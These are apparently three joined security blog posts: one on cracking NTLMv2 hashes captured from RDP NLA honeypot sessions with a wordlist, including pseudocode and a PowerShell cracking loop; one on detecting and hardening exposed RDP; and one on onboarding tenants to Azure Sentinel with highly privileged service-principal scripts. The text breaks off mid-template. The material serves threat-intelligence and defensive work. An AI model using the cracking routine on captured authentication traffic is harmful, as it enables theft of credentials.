
Cracking RDP NLA Supplied Credentials for Threat Intelligence

21 October 2021 at 19:40
By: Ray Lai

NLA Honeypot Part Deux

This is a continuation of the research from Building an RDP Credential Catcher for Threat Intelligence. In the previous post, we described how to build an RDP credential catcher for threat intelligence, with the caveat that we had to disable NLA in order to receive the password in cleartext. However, RDP clients may be attempting to connect with NLA enabled, which is a stronger form of authentication that does not send passwords in cleartext. In this post, we discuss our work in cracking the hashed passwords being sent over NLA connections to ascertain those supplied by threat actors.

This next phase of research was undertaken by Ray Lai and Ollie Whitehouse.

What is NLA?

NLA, or Network Level Authentication, is an authentication method where a user is authenticated via a hash of their credentials over RDP. Rather than passing the credentials in cleartext, a number of computations are performed on a user’s credentials prior to being sent to the server. The server then performs the same computations on its (possibly hashed) copy of the user’s credentials; if they match, the user is authenticated.

By capturing NLA sessions, which includes the hash of a user’s credentials, we can then perform these same computations using a dictionary of passwords, crack the hash, and observe which credentials are being sprayed at RDP servers.

The plan

  1. Capture a legitimate NLA connection.
  2. Parse and extract the key fields from the packets.
  3. Replicate the computations that a server performs on the extracted fields during authentication.

In order to replicate the server’s authentication functionality, we needed an existing server that we could look into. To do this, we modified FreeRDP, an open-source RDP client and server software that supported NLA connections.

Our first modification was to add extra debug statements throughout the code in order to trace which functions were called during authentication. Looking at this list of called functions, we determined six functions that either parsed incoming messages or generated outgoing messages.

There are six messages that are sent (“In” or “Out” is from the perspective of the server, so “Negotiate In” is a message sent from the client to the server):

  1. Negotiate In
  2. Negotiate Out
  3. Challenge In
  4. Challenge Out
  5. Authenticate In
  6. Authenticate Out

Once identified, we patched these functions to write the packets to a file. We named the files XXXXX.NegotiateIn, XXXXX.ChallengeOut, etc., with XXXXX being a random integer that was specific to that session, so that we could keep track of which packets were for which session.

Parsing the packets

With the messages stored in files, we began work to parse them. For a proof of concept, we wrote a parser for these six messages in Python to gain a high-level understanding of what was needed to crack the hashes contained within the messages. We parsed out each field into its own object, taking hints from the FreeRDP code.

Dumping intermediary calculations

When it came time to figure out what type of calculation was being performed by each function (or each step of the function), we also added code to individual functions to dump the raw bytes given as inputs and outputs, in order to ensure that the calculations were correctly replicated in the Python code.

Finally, authentication

The ultimate step in NLA authentication is when the server receives the “Authenticate In” message from the client. At that point, it takes all the previous messages, performs some calculations on them, and compares the result with the “MIC” stored in the “Authenticate In” message.

MIC stands for Message Integrity Check, and is roughly the following:

# User, Domain, Password are UTF-16 little-endian
NtHash = MD4(Password)
NtlmV2Hash = HMAC_MD5(NtHash, User + Domain)
ntlm_v2_temp_chal = ChallengeOut->ServerChallenge
                  + "\x01\x01\x00\x00\x00\x00\x00\x00"
                  + ChallengeIn->Timestamp
                  + AuthenticateIn->ClientChallenge
                  + "\x00\x00\x00\x00"
                  + ChallengeIn->TargetInfo
NtProofString = HMAC_MD5(NtlmV2Hash, ntlm_v2_temp_chal)
KeyExchangeKey = HMAC_MD5(NtlmV2Hash, NtProofString)
if EncryptedRandomSessionKey:
    ExportedSessionKey = RC4(KeyExchangeKey, EncryptedRandomSessionKey)
else:
    ExportedSessionKey = KeyExchangeKey
msg = NegotiateIn + ChallengeIn + AuthenticateOut
MIC = HMAC_MD5(ExportedSessionKey, msg)

In the above algorithm, all values are supplied within the six NLA messages (User, Domain, Timestamp, ClientChallenge, ServerChallenge, TargetInfo, EncryptedRandomSessionKey, NegotiateIn, ChallengeIn, and AuthenticateOut), except for one: Password.

But now that we have the algorithm to calculate the MIC, we can perform this same calculation on a list of passwords. Once the MIC matches, we have cracked the password used for the NLA connection!
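To make that concrete, the following PowerShell sketch shows what the dictionary loop could look like (this is illustrative and not part of the published tooling). It assumes the relevant fields from the captured messages have already been parsed into byte arrays, that no EncryptedRandomSessionKey was sent, and that a Get-Md4Hash helper is available for the NT hash, since MD4 is not exposed by the standard .NET hash classes (both the helper and the variable names are hypothetical).

function Get-HmacMd5([byte[]]$Key, [byte[]]$Data) {
    # HMAC-MD5 via .NET, used for every step of the MIC computation above
    $hmac = [System.Security.Cryptography.HMACMD5]::new($Key)
    try { return $hmac.ComputeHash($Data) } finally { $hmac.Dispose() }
}

# User and Domain are UTF-16 little-endian, as in the algorithm above
$userDomain = [System.Text.Encoding]::Unicode.GetBytes($User + $Domain)

foreach ($candidate in Get-Content '.\wordlist.txt') {
    $ntHash     = Get-Md4Hash ([System.Text.Encoding]::Unicode.GetBytes($candidate))   # hypothetical MD4 helper
    $ntlmV2Hash = Get-HmacMd5 $ntHash $userDomain
    $tempChal   = [byte[]]($ServerChallenge + [byte[]](1,1,0,0,0,0,0,0) + $Timestamp +
                           $ClientChallenge + [byte[]](0,0,0,0) + $TargetInfo)
    $ntProof    = Get-HmacMd5 $ntlmV2Hash $tempChal
    $sessionKey = Get-HmacMd5 $ntlmV2Hash $ntProof      # KeyExchangeKey = ExportedSessionKey (no key exchange)
    $mic        = Get-HmacMd5 $sessionKey ([byte[]]($NegotiateIn + $ChallengeIn + $AuthenticateOut))
    if ([Convert]::ToBase64String($mic) -eq [Convert]::ToBase64String($CapturedMic)) {
        Write-Host "Cracked password: $candidate"
        break
    }
}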

At this point we are ready to start setting up RDP credential catchers, dumping the NLA messages, and cracking them with a list of passwords.

Code

All the code we developed as part of this project has been open sourced here – https://github.com/nccgroup/nlahoney – along with all our supporting research notes and code.

Future

The next logical step would be to rewrite the Python password cracker into a hashcat module, left as an exercise to the reader.

Detecting and Protecting when Remote Desktop Protocol (RDP) is open to the Internet

21 October 2021 at 16:48

Category:  Detection/Reduction/Prevention

Overview

Remote Desktop Protocol (RDP) is how users of Microsoft Windows systems can get a remote desktop session on other systems to manage one or more workstations and/or servers.  With the increase in organizations opting for remote work, RDP usage over the internet has also increased. However, RDP was not initially designed with the security and privacy features needed to use it securely over the internet. RDP communicates over the widely known port 3389, making it very easy to discover by criminal threat actors.  Furthermore, the default authentication method is limited to only a username and password.

The dangers of exposed RDP, and of similar solutions such as TeamViewer (port 5938) and VNC (port 5900), are demonstrated in a recent report published by cybersecurity researchers at Coveware. The researchers found that 42 percent of ransomware cases in Q2 2021 leveraged RDP compromise as an attack vector. They also found that “In Q2 email phishing and brute forcing exposed remote desktop protocol (RDP) remained the cheapest and thus most profitable and popular methods for threat actors to gain initial foot holds inside of corporate networks.”

RDP has also had its fair share of critical vulnerabilities targeted by threat actors. For example, the BlueKeep vulnerability (CVE-2019-0708), first reported in May 2019, was present in all unpatched versions of Microsoft Windows 2000 through Windows Server 2008 R2 and Windows 7.  Subsequently, September 2019 saw the release of a public wormable exploit for the RDP vulnerability.

The following details are provided to assist organizations in detecting, threat hunting, and reducing malicious RDP attempts.

The Challenge for Organizations

The limitations of authentication mechanisms for RDP significantly increases the risk to organizations with instances of exposed RDP to the internet. By default, RDP does not have a built-in multi-factor authentication (MFA). To add MFA to RDP logins, organizations will have to implement a Remote Desktop Gateway or place the RDP server behind a VPN that supports MFA. However, these additional controls add cost and complexity that some organizations may not be able to support.

The risk of exposed RDP is further heightened by users’ propensity for password reuse. If employees use the same password for RDP as they do for other websites, then when a website gets breached, threat actors will likely add that password to a list for use in brute force attempts.

Organizations with poor password policies are bound to the same pitfalls as password reuse for RDP.  Shorter and easily remembered passwords give threat actors an increased chance of success when brute forcing exposed RDP instances.

Another challenge is that organizations do not often monitor RDP logins, allowing successful RDP compromises to go undetected. In the event that RDP logins are collected, organizations should work to make sure that, at the very least, timestamps, IP addresses, and the country or city of the login are ingested into a log management solution.

Detection

Detecting the use of RDP is something that is captured in several logs within a Microsoft Windows environment. Unfortunately, most organizations do not have a log management or SIEM solution to collect the logs that could alert to misuse, furthering the challenge to organizations to secure RDP. 

RDP Access in the logs

RDP logons or attacks will generate several log events in several event logs.  These events will be found on the target systems that had RDP sessions attempted or completed, or on the Active Directory domain controllers that handled the authentication.  These events would need to be collected into a log management or SIEM solution in order to create alerts for RDP behavior.  There are also events on the source system that can be collected, but we will save that for another blog.

Being that multiple log sources contain RDP details, why collect more than one? The devil is in the details, and in the case of RDP artifacts, various events from different log sources can provide greater clarity of RDP activities. For investigations, the more logs, the better if malicious behavior is suspected.

Of course, organizations have to consider log management volume when ingesting new log sources, and many organizations do not collect workstation endpoint logs where RDP logs are generated. However, some of the logs specific to RDP will generally have a low quantity of events and are likely not to impact a log management volume or license. This is especially true because RDP logs are only found on the target system, and typically RDP is seldom used for workstations.

Generally, the more low-noise, low-volume, high-validity events you can collect from all endpoints into a log management solution, the better your malicious-behavior detection can be. An organization will need to test and decide which events to ingest based collectively on their environment, log management solution, and the impact on licensing and volume.

The Windows Advanced Audit Policy will need to have the following policy enabled to collect these events:

  • Logon/Logoff – Audit Logon = Success and Failed

The following query logic can be used; it contains a lot of detail about all authentication to a system, so this is a high-volume event (a sample collection query is sketched after the list):

  • Event Log = Security
  • Event ID = 4624 (success)
  • Event ID = 4625 (failed)
  • Logon Type = 10 (RDP)
  • Account Name = The user name logging on
  • Workstation Name = This will be from the log of the system being logged on to
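As a quick example of pulling these events locally with PowerShell (a sketch for illustration; in practice this query would normally live in your log management or SIEM solution):

# Pull recent successful RDP logons (Event ID 4624, Logon Type 10) from the Security log.
$xpath = "*[System[EventID=4624] and EventData[Data[@Name='LogonType']='10']]"
Get-WinEvent -LogName 'Security' -FilterXPath $xpath -MaxEvents 50 | ForEach-Object {
    $xml = [xml]$_.ToXml()
    [pscustomobject]@{
        Time        = $_.TimeCreated
        Account     = ($xml.Event.EventData.Data | Where-Object Name -eq 'TargetUserName').'#text'
        Workstation = ($xml.Event.EventData.Data | Where-Object Name -eq 'WorkstationName').'#text'
        SourceIP    = ($xml.Event.EventData.Data | Where-Object Name -eq 'IpAddress').'#text'
    }
}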

Optionally, another audit policy can be enabled to collect RDP events, but this will also generate a lot of other logon noise.  The Windows Advanced Audit Policy will need to have the following policy enabled to collect these events:

  • Logon/Logoff – Other Logon/Logoff Events = Success and Failed

The following query logic can be used; it contains a few details about session authentication to a system, so these are low-volume events:

  • Event Log = Security
  • Event ID = 4778 (connect)
  • Event ID = 4779 (disconnect)
  • Account Name = The user name of the session being connected or disconnected
  • Session Name = RDP-Tcp#3
  • Client Name = This will be the system name of the source system making the RDP connection
  • Client Address = This will be the IP address of the source system making the RDP connection

There are also several RDP logs that will record valuable events that can be investigated during an incident to determine the source of the RDP login.  Fortunately, the Windows Advanced Audit Policy will not need to be updated to collect these events, as they are on by default.

The following query logic can be used; it contains a few details about RDP connections to a system, so these are low-volume events (a sample query is sketched after the list):

  • Event Log = Microsoft-Windows-TerminalServices-LocalSessionManager
  • Event ID = 21 (RDP connect)
  • Event ID = 24 (RDP disconnect)
  • User = The user that made the RDP connection
  • Source Network Address = The system where the RDP connection originated
  • Message = The connection type
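A sketch of the equivalent local collection with PowerShell (note that the on-disk channel name carries an /Operational suffix):

# Query RDP connect (21) and disconnect (24) events from the LocalSessionManager log.
Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational'
    Id      = 21, 24
} -MaxEvents 50 | Select-Object TimeCreated, Id, Message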

The nice thing about these logs is that even if a threat actor clears the log before disconnecting, Event ID 24 (disconnect) will still be created after the logs have been cleared, once the user disconnects.  This allows tracing of the path the user and/or threat actor took from system to system.

The following query logic can also be used; it contains a few details about RDP connections to a system, so these are low-volume events:

Event Log = Microsoft-Windows-TerminalServices-RemoteConnectionManager

  • Event ID = 1149 (RDP connect)
  • User = The user that made the RDP connection
  • Source Network Address = The system where the RDP connection originated

Event Log = Microsoft-Windows-TerminalServices-RDPClient

  • Event ID = 1024 (RDP connection attempt)
  • Event ID = 1102 (RDP connect)
  • Message = The system where the RDP connection originated

Threat Hunting

The event IDs previously mentioned would be a good place to start when hunting for RDP access. Since RDP logs are found on the target host, an organization will need a solution or process to check each workstation and server for these events in the appropriate log, or use a log management or SIEM solution to perform searches. Threat actors may clear one or more logs before disconnecting, but fortunately, the disconnect event will be in the logs, allowing the investigator to see the source of the RDP disconnect. This disconnect (Event ID 24) can be used to focus hunts on finding the initial access point of the RDP connection if the logs are cleared.
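As a rough sketch of what such a hunt could look like with PowerShell remoting (assuming WinRM is enabled; the hosts.txt file holding the systems to sweep is hypothetical):

# Sweep a list of hosts for RDP disconnect events (Event ID 24); the event message
# records the user and the source network address of the RDP session.
$targets = Get-Content '.\hosts.txt'
Invoke-Command -ComputerName $targets -ScriptBlock {
    Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational'
        Id      = 24
    } -ErrorAction SilentlyContinue | Select-Object MachineName, TimeCreated, Message
}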

Reduction/Prevention

The best and easiest option to reduce the likelihood of malicious RDP attempts is to remove RDP from being accessible from the internet.  NCC Group has investigated many incidents where our customers have had RDP open to the internet, only to find that it was actively under attack without the client knowing it, or that it was the source of the compromise.  Knowing that RDP is highly vulnerable, as the Coveware report states, removing RDP from the internet, securing it, or finding another alternative is the strongest recommendation NCC Group can make for organizations that need RDP for remote desktop functions.

Remote Desktop Gateway

Remote Desktop Gateway (RD Gateway) is a role added to a Windows Server that you publish to the internet; it provides SSL-encrypted RDP access (over TCP port 443 and UDP port 3391) instead of the RDP protocol over port 3389.  The RD Gateway option is more secure than RDP alone, but should still be protected with MFA.

Virtual Private Network (VPN)

Another standard option to reduce malicious RDP attempts is to place RDP behind a VPN.  If VPN infrastructure is already in place, organizations can easily adjust their firewalls to accommodate this.  Organizations should also monitor VPN logins for access attempts, resolving the source IP to the country of origin.  Allow lists of known good IP addresses for users can be implemented to reduce the noise of voluminous VPN access alerts and highlight anomalies.

Jump Host

Many organizations utilize jump hosts protected by MFA to authenticate before connecting to internal systems via RDP.  However, keep in mind that jump hosts face the internet and are thus susceptible to flaws in the jump host application. Therefore, organizations should monitor the jump host application and apply patches as fast as possible.

Cloud RDP

Another option is to use a cloud environment like Microsoft Azure to host a remote solution that provides MFA to deliver trusted connections back to the organization.

Change the RDP Listening Port

Although not recommended as a way to simply prevent RDP attacks, swapping the default port from 3389 to another port can be helpful from a detection standpoint. By editing the Windows registry, the default listening port can be modified, and organizations can implement a SIEM detection to capture port 3389 attempts. However, keep in mind that even though the port changes, recon scans can easily detect RDP listening on another port, in which case an attacker can simply change their target port.
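For illustration, the change could be made along these lines (run as administrator; port 3390 and the firewall rule name are only examples):

# Change the RDP listening port in the registry, allow the new port, then restart the service.
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' `
    -Name 'PortNumber' -Value 3390 -Type DWord
New-NetFirewallRule -DisplayName 'RDP (custom port)' -Direction Inbound -Protocol TCP `
    -LocalPort 3390 -Action Allow
Restart-Service -Name TermService -Force   # note: this will drop any active RDP sessions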

IP Address restrictions

Lastly, organizations can use a dedicated firewall appliance or Windows Firewall on the host machines managed by Group Policy to restrict RDP connections to known good IP addresses. However, this option comes with a high administrative burden as more users are provisioned or travel for work. Nevertheless, this option is often the best short-term solution to secure RDP until one of the more robust solutions can be engineered and put in place.
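On the host side, one way to apply such a restriction is to scope the built-in Remote Desktop firewall rule group to an allow list (a sketch; the addresses below are placeholders for your known good IPs or ranges):

# Restrict the built-in Remote Desktop firewall rules to known good source addresses.
$allowed = '203.0.113.10', '198.51.100.0/24'
Get-NetFirewallRule -DisplayGroup 'Remote Desktop' | Set-NetFirewallRule -RemoteAddress $allowed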

Conclusion

Organizations should carefully consider the risks when utilizing RDP over the internet. We hope this blog entry helps provide options to reduce the risk of infection and compromise from the ever-increasing attacks on RDP, as well as some things to consider when implementing and using RDP.


Enterprise-scale seamless onboarding and deployment of Azure Sentinel using Lighthouse for multi-tenant environments

19 October 2021 at 17:27

NCC Group is offering a new fully Managed Detection and Response (MDR) service for our customers in Azure. This blog post gives a behind the scenes view of some of the automated processes involved in setting up new environments and managing custom analytics for each customer, including details about our scripting and automated build and release pipelines, which are deployed as infrastructure-as-code.

If you are:

  • a current or potential customer interested in how we manage our releases
  • just starting your journey into onboarding Sentinel for large multi-Tenant environments
  • looking to enhance existing deployment mechanisms
  • interested in a way to manage multi-Tenant deployments with varying set-ups

…you have come to the right place!

Background

Sentinel is Microsoft’s new Security Information and Event Management solution hosted entirely on Azure.

NCC Group has been providing MDR services for a number of years using Splunk and we are now adding Sentinel to the list.

The benefit of Sentinel over the Splunk offering is that you will be able to leverage existing Azure licenses and all data will be collected and visible in your own Azure tenants.

The only bits we keep on our side are the custom analytics and data enrichment functions we write for analysing the data.

What you might learn

The solution covered in this article provides a possible way to create an enterprise scale solution that, once implemented, gives the following benefits:

  • Management of a large number of tenants with differing configurations and analytics
  • Minimal manual steps for onboarding new tenants
  • Development and source control of new custom analytics
  • Management of multiple tenants within one Sentinel instance
  • Zero downtime / parallel deployments of new analytics
  • Custom web portal to manage onboarding, analytics creation, baselining, and configuration of each individual tenant’s connectors and enabled analytics

The main components

Azure Sentinel

Sentinel is Microsoft’s cloud native SIEM (Security Information and Event Management) solution. It allows for the gathering of a large number of log and event sources to be interrogated in real time, using built-in and custom KQL to automatically identify and respond to threats.

Lighthouse

“Azure Lighthouse enables multi-tenant management with scalability, higher automation, and enhanced governance across resources.”

In essence, it allows a master tenant direct access to one or many sub or customer tenants without the need to switch directory or create custom solutions.

Lighthouse is used in this solution to connect to log analytics workspaces in additional tenants and view them within the same instance of Sentinel in our “master tenant”.

Log Analytics Workspaces

Log Analytics workspaces are where the data from sources connected to Sentinel goes in this scenario. We will connect workspaces from multiple tenants via Lighthouse to allow for cross-tenant analysis.

Azure DevOps (ADO)

Azure DevOps provides the core functionality for this solution, used for both its CI/CD pipelines (using YAML, not Classic, for this) and its built-in Git repos. The solution provided will of course work if you decide to go for a different system.

App Service

To allow for easy management of configurations, onboarding, and analytics development / baselining, we hosted a small web application written in Blazor, to avoid having to manually change JSON config files. The app also draws in MITRE and other additional data to enrich analytics.

Technologies breakdown:

In order for us to create and manage the required services, we need to make use of Infrastructure as Code (IaC), scripting, and automated build and release pipelines, as well as have a way to develop a management portal.

The technologies we ended up using for this were:

  • ARM Templates for general resource deployments and some of the connectors
  • PowerShell using the Microsoft Az / Sentinel modules and Roberto Rodriguez’s Azure-Sentinel2Go
  • API calls for baselining and connectors not available through PowerShell modules
  • Blazor for configuration portal development
  • C# for API backend Azure function development
  • YAML Azure DevOps Pipelines

Phase 1: Tenant Onboarding

Let’s step through this diagram.

We are going to have a portal that allows us to configure a new client and go through an approval step (to ensure configs are peer reviewed before going into production) by pushing the configuration into a new branch in source control, and then trigger a deployment pipeline.

The pipeline triggers 2 Tenant deployments.

Tenant A is our “Master tenant” that will hold the main Sentinel, all custom analytics, alerts, and playbooks, and connect, using Lighthouse, to all “Sub tenants” (Tenant B).

In large organisations, we would create a 1:1 mapping for each sub tenant by deploying additional workspaces that then point to the individual tenants. This has the benefit of keeping the analytics centralised, protecting intellectual property. You could, however, deploy them directly into the actual workspaces once Lighthouse is set up, or have one workspace that queries all the others.

Tenant B and all other additional Tenants have their own instance of Sentinel with all required connectors enabled and need to have the lighthouse connection initiated from that side.

Pre-requisites:

To be able to deploy to either of the tenants we need Service connections for Azure DevOps to be in place.

“Sub tenant” deployment:

Some of the Sentinel connectors need pretty extreme permissions to be enabled; for example, to configure the Active Directory connector properly we need the Global Administrator and Security Administrator roles, as well as root scope Owner permissions on the tenant.

In most cases, once the initial set up of the “sub tenant” is done, there will rarely be a need to add additional connectors or deploy to that tenant, as all analytics are created on the “Master tenant”. I would strongly suggest either disabling or completely removing the Tenant B service connection after setup. If you are planning to regularly change connectors and are happy with the risk of leaving this service principal in place, then the steps will allow you to do this.

A sample script for setting up the “Sub tenant” Service Principal:

$rgName = 'resourceGroupName' ## set the value of this to the resource group name containing the sentinel log analytics workspace
Connect-AzAccount
$cont = Get-AzContext
Connect-AzureAD -TenantId $cont.Tenant
 
$sp = New-AzADServicePrincipal -DisplayName ADOServicePrincipalName

Sleep 20
$assignment =  New-AzRoleAssignment -RoleDefinitionName Owner -Scope '/' -ServicePrincipalName $sp.ApplicationId -ErrorAction SilentlyContinue
New-AzRoleAssignment -RoleDefinitionName Owner -Scope "/subscriptions/$($cont.Subscription.Id)/resourceGroups/$($rgName)" -ServicePrincipalName $sp.ApplicationId
New-AzRoleAssignment -RoleDefinitionName Owner -Scope "/subscriptions/$($cont.Subscription.Id)" -ServicePrincipalName $sp.ApplicationId

$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($sp.Secret)
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
$roles = Get-AzureADDirectoryRole | Where-Object {$_.displayName -in ("Global Administrator","Security Administrator")}
foreach($role in $roles)
{
Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.Id
}
$activeDirectorySettingsPermissions = ($null -ne $assignment) # true if the root scope Owner assignment succeeded
$sp | select @{Name = 'Secret'; Expression = {$UnsecureSecret}},@{Name = 'tenant'; Expression = {$cont.Tenant}},@{Name = 'Active Directory Settings Permissions'; Expression = {$activeDirectorySettingsPermissions}},@{Name = 'sub'; Expression = {$cont.Subscription}}, applicationId, Id, DisplayName

This script will:

  1. create a new Service Principal,
  2. set the Global Administrator and Security Administrator roles for the principal,
  3. attempt to give root scope Owner permissions, with subscription scope Owner as a backup, which is the minimum required to connect Lighthouse if the root scope permissions are not set.

The end of the script prints out the details required to set this up as a Service connection in Azure DevOps. You could of course continue on to add the Service connection directly to Azure DevOps if the person running the script has access to both, but it was not feasible for my requirements.

For Tenant A we have 2 options.

Option 1: One Active Directory group to rule them all

This is something you might do if you are setting things up for your own multi-tenant environments. If you have multiple environments to manage and different analyst access for each, I would strongly suggest using Option 2.

Create an empty Azure Active Directory group either manually or using

(New-AzADGroup -DisplayName 'GroupName' -MailNickname 'none').Id
(Get-AzTenant).Id

You will need the IDs of both the group and the tenant in a moment, so don’t lose them just yet.

Once the group is created, set up a Service Connection to your Master tenant from Azure DevOps (just use the normal connection Wizard), then add the Service Principal to the newly created group as well as users you want to have access to the Sentinel (log analytics) workspaces.

To match the additional steps in Option 2, create a Variable group (either directly but masked or connected to a KeyVault depending on your preference) in Azure DevOps (Pipelines->Library->+Variable Group)

Make sure you restrict both Security and Pipeline permissions for the variable group to only be usable for the appropriate pipelines and users whenever creating variable groups.

Then add:

  • AAdGroupID with your new Group ID
  • TenantID with the Tenant ID of the master tenant.

Then reference the Group at the top of your YAML pipeline within the Job section with

variables:
      - group: YourGroupName

Option 2: One group per “Sub tenant”

If you are managing customers, this is a much better way to handle things. You will be able to assign different users to the groups to ensure only the correct people have access to the environments they are meant to have.

However, to be able to do this you need a Service Connection with some additional rights in your “Master Tenant”, so your pipelines can automatically create customer specific AD groups and add the Service principal to them.

Set up a Service Connection from Azure DevOps to your Master Tenant, then find the Service Principal and give it the following permissions

  • Azure Active Directory Graph
    • Directory.ReadWrite.All
  • Microsoft Graph
    • Directory.ReadWrite.All
    • PrivilegedAccess.ReadWrite.AzureADGroup

Then include the following script in your pipeline to create the group to be used for each customer and add the service principal to it.

param(
    [string]$AADgroupName,
    [string]$ADOServicePrincipalName
)
$group1 = Get-AzADGroup -DisplayName $AADgroupName -ErrorAction SilentlyContinue
if(-not $group1)
{
$guid1 = New-Guid
$group1 = New-AzADGroup -DisplayName $AADgroupName  -MailNickname $guid1 -Description $AADgroupName
$spID = (Get-AzADServicePrincipal -DisplayName $ADOServicePrincipalName).Id
Add-AzADGroupMember -MemberObjectId $spID -TargetGroupObjectId $group1.Id
}
$id = $group1.id
$tenant = (Get-AzTenant).Id
Write-Host "##vso[task.setvariable variable=AAdGroupId;isOutput=true]$($id)"
Write-Host "##vso[task.setvariable variable=TenantId;isOutput=true]$($tenant)" 

The Write-Host lines at the end of the script output the group and tenant ID back to the pipeline to be used in setting up Lighthouse later.

With the boring bits out of the way, let’s get into the core of things.

Client configurations

First, we need to create configuration files to be able to manage the connectors and analytics that get deployed for each “Sub tenant”.

You can of course do this manually, but I opted to go for a slightly more user-friendly approach with the Blazor App.

The main bits we need, highlighted in yellow above are:

  • A name for the config
  • The Azure DevOps Service Connection name for the target Sub tenant
  • Azure Region (if you are planning to deploy to multiple regions)
  • Target Resource Group and Target Workspace: either where the Log Analytics workspace of your target environment already exists or where it should be created

Client config Schema:

    public class ClientConfig
    {
        public string ClientName { set; get; } = "";
        public string ServiceConnection { set; get; } = "";
        public List<Alert> SentinelAlerts { set; get; } = new List<Alert>();
        public List<Search> SavedSearches { set; get; } = new List<Search>();
        public string TargetWorkspaceName { set; get; } = "";
        public string TargetResourceGroup { set; get; } = "";
        public string Location { get; set; } = "UK South";
        public string connectors { get; set; } = "";
    }

Sample Config output:

{
    "ClientName": "TenantB",
    "ServiceConnection": "ServiceConnectionName",
    "SentinelAlerts": [
        {
            "Name": "ncc_t1558.003_kerberoasting"
        },
        {
            "Name": "ncc_t1558.003_kerberoasting_downgrade_v1a"
        }
    ],
    "SavedSearches": [],
    "TargetWorkspaceName": "targetworkspace",
    "TargetResourceGroup": "targetresourcegroup",
    "Location": "UK South",
    "connectors": "Office365,ThreatIntelligence,OfficeATP,AzureAdvancedThreatProtection,AzureActiveDirectory,MicrosoftDefenderAdvancedThreatProtection,AzureSecurityCenter,MicrosoftCloudAppSecurity,AzureActivity,SecurityEvents,WindowsFirewall,DNS,Syslog"
}

This data can then be pushed onto a storage account and imported into Git from a pipeline triggered through the app.

pool:
  vmImage: 'windows-latest'

steps:
- checkout: self
  persistCredentials: true
  clean: true

- task: AzurePowerShell@5
  displayName: 'Export Configs'
  inputs:
    azureSubscription: 'Tenant A Service Connection name'
    ScriptType: 'FilePath'
    ScriptPath: '$(Build.SourcesDirectory)/Scripts/Exports/ConfigExport.ps1'
    ScriptArguments: '-resourceGroupName "StorageAccountResourceGroupName" -storageName "storageaccountname" -outPath "Sentinel\ClientConfigs\" -container "configs"'
    azurePowerShellVersion: 'LatestVersion'

- task: PowerShell@2
  displayName: 'Commit Changes to new Git Branch'
  inputs:
    filePath: '$(Build.SourcesDirectory)/Scripts/PipelineLogic/PushToGit.ps1'
    arguments: '-branchName conf$(Build.BuildNumber)'

Where ConfigExport.ps1 is:

param(
    [string]$ResourceGroupName,
    [string]$storageName,
    [string]$outPath,
    [string]$container
)

$ctx = (Get-AzStorageAccount -ResourceGroupName $ResourceGroupName -Name $storageName).Context
$blobs  = Get-AzStorageBlob -Container $container -Context $ctx

if(-not (Test-Path -Path $outPath))
{
New-Item -ItemType directory $outPath -Force
}
Get-ChildItem -Path $outPath -Recurse | Remove-Item -force -recurse
foreach($file in $blobs)
{
Get-AzStorageBlobContent -Context $ctx -Container $container -Blob $file.Name  -Destination ("$($outPath)/$($file.Name)") -Force
}

And PushToGit.ps1

param(
[string] $branchName
)
git --version
git switch -c $branchName
git add -A
git config user.email [email protected]
git config user.name "Automated Build"
git commit -a -m "Committing rules to git"
git push --set-upstream -f origin $branchName

This will download the config files, create a new Branch in the Azure DevOps Git Repo and upload the files.

The branch can then be reviewed and merged. You could bypass this and check directly into the main branch if you want less manual intervention, but the manual review adds an extra layer of security to ensure no configs are accidentally / maliciously changed.

Creating Analytics

For analytics creation we have 2 options.

  1. Create Analytics in a Sentinel Test environment and export them to git. This will allow you to source control analytics as well as review any changes before allowing them into the main branch.
param(
    [string]$resourceGroupName,
    [string]$workspaceName,
    [string]$outPath,
    [string]$module = 'Scripts/Modules/Remove-InvalidFileNameChars.ps1'
)
Import-Module $module

Install-Module -Name Az.Accounts -AllowClobber -Force
Install-Module -Name Az.SecurityInsights -AllowClobber -Force

$results = Get-AzSentinelAlertRule -WorkspaceName $workspaceName -ResourceGroupName $resourceGroupName
$results
$myExtension = ".json"
$output = @()
foreach ($temp in $results) {
    if ($temp.DisplayName) {
        $resultName = $temp.DisplayName
        if ($temp.query) {
            if ($temp.query.Contains($workspaceName)) {
                $temp.query = $temp.query -replace $workspaceName, '{{targetWorkspace}}'
                $myExportPath = "$($outPath)\Alerts\$($temp.productFilter)\"
                if (-not (Test-Path -Path $myExportPath)) {
                    New-Item -ItemType Directory -Force -Path $myExportPath
                }
                $rule = $temp | ConvertTo-Json
                $resultName = Remove-InvalidFileNameChars -Name $resultName
                $folder = "$($myExportPath)$($resultName)$($myExtension)"
                $properties = [pscustomobject]@{DisplayName = ($temp.DisplayName); RuleName = $resultName; Category = ($temp.productFilter); Path = $myExportPath}
                $output += $properties
                $rule | Out-File $folder -Force
            }
        }
    }
}

Note the -replace $workspaceName , ‘{{targetWorkspace}}’. This replaces the actual workspace name used in our test environments, referenced via workspace(‘testworkspaceName’), with workspace(‘{{targetWorkspace}}’), allowing us to then swap in the actual “Sub tenant” workspace name when the analytic is deployed.

  2. Create your own analytics in a custom portal; for the Blazor portal I found Microsoft.Azure.Kusto.Language very useful for validating the KQL queries.

The benefit of creating your own is the ability to enrich what goes into them.

You might, for example, want to add full MITRE details into the analytics to be able to easily generate a MITRE coverage report for the created analytics.

If you are this way inclined, when deploying the analytics, use a generic template from Sentinel and replace the required values before submitting it back to your target Sentinel.

{
    "AlertRuleTemplateName":  null,
    "DisplayName":  "{DisplayPrefix}{DisplayName}",
    "Description":  "{Description}",
    "Enabled":  true,
    "LastModifiedUtc":  "\/Date(1619707105808)\/",
    "Query":  "{query}",
    "QueryFrequency":  {
        "Ticks":  9000000000,
        "Days":  0,
        "Hours":  0,
        "Milliseconds":  0,
        "Minutes":  15,
        "Seconds":  0,
        "TotalDays":  0.010416666666666666,
        "TotalHours":  0.25,
        "TotalMilliseconds":  900000,
        "TotalMinutes":  15,
        "TotalSeconds":  900
    },
    "QueryPeriod":  {
        "Ticks":  9000000000,
        "Days":  0,
        "Hours":  0,
        "Milliseconds":  0,
        "Minutes":  15,
        "Seconds":  0,
        "TotalDays":  0.010416666666666666,
        "TotalHours":  0.25,
        "TotalMilliseconds":  900000,
